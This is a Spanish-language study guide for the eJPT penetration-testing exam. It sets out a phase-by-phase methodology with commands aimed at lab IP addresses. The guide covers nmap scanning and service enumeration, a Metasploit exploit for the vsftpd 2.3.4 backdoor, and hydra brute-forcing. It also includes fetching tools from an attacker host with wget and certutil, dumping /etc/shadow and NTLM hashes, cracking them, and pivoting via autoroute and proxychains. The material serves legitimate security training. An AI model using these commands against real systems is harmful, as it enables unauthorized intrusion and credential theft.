Guía de preparación eJPT

eJPT Exam
Study Guide

Los comandos, técnicas y metodología que necesitas tener claros para prepararte para el examen eJPT.

 
 
eJPT
Exam
Study Guide
01  Reconocimiento
02  Escaneo
03  Enumeración
04  Análisis
05  Explotación
06  Post-Explotación
07  Pivoting
  Guía de preparación eJPT

eJPT Exam
Study Guide

Los comandos, técnicas y metodología que necesitas tener claros para prepararte para el examen eJPT.

 
eJPT
Exam
Study Guide
01   Reconocimiento
02   Escaneo
03   Enumeración
04   Análisis
05   Explotación
06   Post-Explotación
07   Pivoting
  01 · Reconocimiento

Conoce tu posición dentro de la red

Identifica tu configuración de red y las redes que puedes alcanzar antes de comenzar el escaneo.

Identifica tus interfaces de red y confirma tu IP.
ip -br addr
Revisa tus rutas para identificar las redes alcanzables.
ip route
 
  02 · Escaneo

Identifica hosts, puertos, servicios y sistema operativo

Identifica los sistemas activos y la superficie expuesta antes de comenzar la enumeración.

Descubre los hosts activos dentro de la red objetivo.
nmap -sn 10.10.10.0/24
Usa -Pn para escanear objetivos que podrían bloquear el ping.
nmap -Pn 10.10.10.0/24
Realiza un SYN Scan para identificar puertos TCP rápidamente.
nmap -sS 10.10.10.20
Escanea todos los puertos TCP para no omitir posibles entradas.
nmap -sS -p- 10.10.10.20
Escanea puertos UDP para descubrir servicios adicionales.
nmap -sU --top-ports 100 10.10.10.20
Detecta servicios y versiones TCP.
nmap -sV -p 21,22,80,445 10.10.10.20
Detecta servicios y versiones UDP.
nmap -sU -sV -p 53,161 10.10.10.20
Detecta el sistema operativo.
nmap -O 10.10.10.20
 
  03 · Enumeración

Profundiza en cada servicio expuesto

Obtén información que revele usuarios, archivos, configuraciones, credenciales o posibles vectores de entrada.

Comprueba si FTP permite acceso anónimo.
ftp 10.10.10.20
Identifica la versión de SSH para orientar el análisis posterior.
nmap -sV -p 22 10.10.10.20
Enumera usuarios SMTP mediante el comando VRFY.
smtp-user-enum -M VRFY -U usuarios.txt -t 10.10.10.20
Enumera información expuesta por SNMP usando la community public.
snmpwalk -v2c -c public 10.10.10.20
Enumera recursos SMB disponibles sin autenticación.
smbclient -L //10.10.10.20/ -N
Enumera usuarios, shares y otra información expuesta por SMB.
enum4linux -a 10.10.10.20
Valida credenciales contra WinRM para comprobar acceso remoto.
nxc winrm 10.10.10.20 -u usuario -p password
Valida credenciales contra RDP para comprobar acceso remoto.
nxc rdp 10.10.10.20 -u usuario -p password
Identifica las tecnologías utilizadas por una aplicación web.
whatweb http://10.10.10.20
Revisa robots.txt para descubrir rutas ocultas o sensibles.
curl http://10.10.10.20/robots.txt
Descubre directorios y archivos ocultos en el servidor web.
gobuster dir -u http://10.10.10.20 -w /usr/share/wordlists/dirb/common.txt
Comprueba los métodos HTTP permitidos por el servidor.
curl -X OPTIONS http://10.10.10.20
Valida las capacidades WebDAV y posibles tipos de archivo permitidos.
davtest -url http://10.10.10.20/
Enumera usuarios de WordPress para identificar cuentas válidas.
wpscan --url http://10.10.10.20 -e u
Enumera plugins de WordPress para identificar componentes expuestos.
wpscan --url http://10.10.10.20 -e p
Identifica módulos, temas y versión expuesta por Drupal.
droopescan scan drupal -u http://10.10.10.20
 
  04 · Análisis

Convierte los hallazgos en rutas de acceso

En esta fase convertimos los hallazgos de enumeración en rutas de acceso antes de comenzar la explotación.

Vulnerabilidades conocidas
Busca vulnerabilidades conocidas para el producto y versión identificados.
searchsploit vsftpd 2.3.4
Identifica los exploits candidatos encontrados.
vsftpd 2.3.4 — Backdoor Command Execution
Exploits asociados a otras versiones o condiciones
Selecciona el exploit que coincida con las condiciones del objetivo.
Descartado: requiere una versión o condición diferente.
Seleccionado: coincide con vsftpd 2.3.4 y permite explotación remota.
Comprueba y prioriza módulos de Metasploit si aplican.
msf6 > search vsftpd
exploit/unix/ftp/vsftpd_234_backdoor
Password Attacks
Mapea los usuarios identificados durante la enumeración.
admin · deploy · backup
Mapea los servicios que requieren autenticación.
SSH · FTP · SMB · WinRM · RDP · MySQL · Web
Selecciona dos listas de contraseñas para los ataques.
unix_passwords.txt
rockyou.txt
Valida credenciales contra MySQL cuando identifiques un usuario válido.
mysql -h 10.10.10.20 -u usuario -p
 
  05 · Explotación

Ejecuta los vectores de acceso seleccionados

En esta fase ejecutamos los vectores seleccionados para obtener acceso al objetivo.

Explota el servicio vulnerable con Metasploit.
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 10.10.10.20
run
Asegúrate de configurar correctamente el payload cuando el módulo lo requiera.
Ejecuta ataques de contraseña contra los servicios planificados.
hydra -L usuarios.txt -P rockyou.txt ssh://10.10.10.20
hydra -L usuarios.txt -P rockyou.txt ftp://10.10.10.20
hydra -L usuarios.txt -P rockyou.txt smb://10.10.10.20
Accede por SSH con credenciales válidas.
ssh usuario@10.10.10.20
Accede por WinRM con credenciales válidas.
evil-winrm -i 10.10.10.20 -u usuario -p password
Accede por RDP con credenciales válidas.
xfreerdp /u:usuario /p:password /v:10.10.10.20
Accede por WebDAV para gestionar archivos remotamente.
cadaver http://10.10.10.20/
Obtén ejecución remota por SMB con credenciales administrativas.
impacket-psexec usuario:password@10.10.10.20
 
  06 · Post-Explotación

Escala privilegios y obtén credenciales

Enumera el sistema comprometido para escalar privilegios, obtener credenciales y ampliar tu acceso.

Linux
Estabiliza la shell para trabajar de forma interactiva.
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
Realiza una enumeración inicial del sistema comprometido.
id
uname -a
hostname
Transfiere herramientas desde Kali al objetivo.
python3 -m http.server 8000
wget http://10.10.10.10:8000/LinEnum.sh
Ejecuta LinEnum para identificar posibles vectores de escalada.
chmod +x LinEnum.sh
./LinEnum.sh
Revisa manualmente los principales vectores de escalada.
sudo -l
find / -perm -4000 -type f 2>/dev/null
getcap -r / 2>/dev/null
cat /etc/crontab
Si trabajas desde Meterpreter, abre una shell del sistema.
meterpreter > shell
Con privilegios elevados, guarda los hashes para analizarlos.
cat /etc/shadow > hashes.txt
Crackea los hashes obtenidos con una wordlist.
john --wordlist=rockyou.txt hashes.txt
Reutiliza las credenciales obtenidas contra otros servicios disponibles.
ssh usuario@10.10.10.50
Windows
Confirma el usuario, privilegios y versión del sistema.
whoami
whoami /priv
systeminfo
Transfiere herramientas desde Kali al objetivo.
certutil -urlcache -f http://10.10.10.10:8000/winPEAS.exe winPEAS.exe
Ejecuta WinPEAS para identificar posibles vectores de escalada.
winPEAS.exe
Revisa manualmente privilegios y configuraciones relevantes.
whoami /priv
sc query
schtasks /query
Con una sesión Meterpreter privilegiada, extrae los hashes locales.
meterpreter > hashdump
Crackea los hashes NTLM obtenidos con una wordlist.
hashcat -m 1000 hashes.txt rockyou.txt
Reutiliza las credenciales obtenidas contra otros servicios disponibles.
evil-winrm -i 10.10.10.50 -u usuario -p password
 
  07 · Pivoting

Utiliza el host comprometido para alcanzar nuevas redes

Identifica redes adicionales y utiliza el sistema comprometido como punto de acceso hacia objetivos internos.

Revisa las interfaces para detectar una red adicional accesible desde Linux.
ip -br addr
ip route
Revisa interfaces y rutas desde un host Windows.
ipconfig
route print
Si existe una segunda red, utiliza el host comprometido como pivot.
meterpreter > run autoroute -s 10.10.20.0/24
Comprueba las rutas añadidas dentro de Metasploit.
msf6 > route print
Escanea objetivos internos usando módulos de Metasploit.
use auxiliary/scanner/portscan/tcp
Expón la red interna a herramientas externas con un proxy SOCKS.
use auxiliary/server/socks_proxy
Accede a la red interna desde Kali mediante ProxyChains.
proxychains nmap -sT -Pn 10.10.20.50
  Antes de terminar

Ya tienes una metodología clara para avanzar en cada fase

Usa esta guía como referencia durante tus prácticas para saber qué hacer, qué buscar y cómo avanzar durante tu preparación para el eJPT.

01  Reconocimiento
02  Escaneo
03  Enumeración
04  Análisis
05  Explotación
06  Post-Explotación
07  Pivoting
 

Ahora ponlo en práctica

Aplica esta metodología resolviendo una máquina vulnerable diseñada para practicar escenarios tipo eJPT.

Respaldado por: